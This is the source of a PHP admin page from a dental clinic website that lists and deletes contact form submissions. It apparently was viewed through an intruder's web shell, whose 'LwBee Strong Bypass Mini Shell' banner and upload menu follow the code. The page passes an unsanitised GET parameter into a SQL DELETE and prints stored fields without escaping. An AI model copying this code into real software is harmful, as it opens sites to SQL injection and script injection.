/home3/vehiclea/public_html/admin-vishnudentalclinic-com/contact_report.php
<?php

    session_start();
 $_SESSION['active'] = 'contactReport';
 
    include('include/header.php');
    $select_contact = select_contact();
    if(!empty($_GET['delid']))
    {
        $delete = executework("delete from contact where id = '".$_GET['delid']."'");
        redirect("contact_report.php?delete=1");
    }
    
?>
<style>
.button {
  border: none;
  color: white;
  padding: 10px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}

.button1 {background-color: #4CAF50;} /* Green */
.button2 {background-color: #b71c1c;} /* Blue */
</style>
<script src='https://kit.fontawesome.com/a076d05399.js' crossorigin='anonymous'></script>

<body>

  
  
  <main id="main" class="main">

    <div class="pagetitle">
      <h1>CONTACT</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="dashboard.php">Home</a></li>
          <li class="breadcrumb-item">Contact Report</li>
          
        </ol>
      </nav>
    </div><!-- End Page Title -->
     
    <section class="section">
      <div class="row">
        <div class="col-lg-12">

          <div class="card">
            <div class="card-body">
              <h5 class="card-title">Contact Report</h5>
                  <?php
                  if(!empty($_GET['delete']))
                  {
                    ?>
                     <div style="color: red;" align="center"><h4>Deleted Successfully</h4></div>
                    <?php
                  }
                ?>
              <!-- Table with stripped rows -->
              <table class="table datatable">
                <thead>
                  <tr>
                    <th scope="col">#</th>
                    <th scope="col">First Name</th>
                    <th scope="col">Last Name</th>
                    <th scope="col">Email</th>
                    <th scope="col">Mobile</th>
                    <th scope="col">Massage</th>
                    <th scope="col">Action</th>
                    
                  </tr>
                </thead>
                <tbody>
                 <?php
                 $i=1;
                   while($row = mysqli_fetch_array($select_contact)){
                    
                 ?>
                
                  <tr>
                    <td><?= $i;?></td>
                  <td><?= $row['fname']?></td>
                  <td><?= $row['lname']?></td>
                  <td><?= $row['eml']?></td>
                  <td><?= $row['phone']?></td>
                  <td><?= $row['message']?></td>
                 <td><a href="contact_report.php?delid=<?= $row['id']?>" class=""><button class="button button2">Delete</button></a></td>
                  </tr>
                  <?php $i++;}?>
                </tbody>
              </table>
              <!-- End Table with stripped rows -->

            </div>
          </div>

        </div>
      </div>
    </section>

  </main><!-- End #main -->

  <!-- ======= Footer ======= -->
  <?php
    include('include/footer.php');
  ?>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File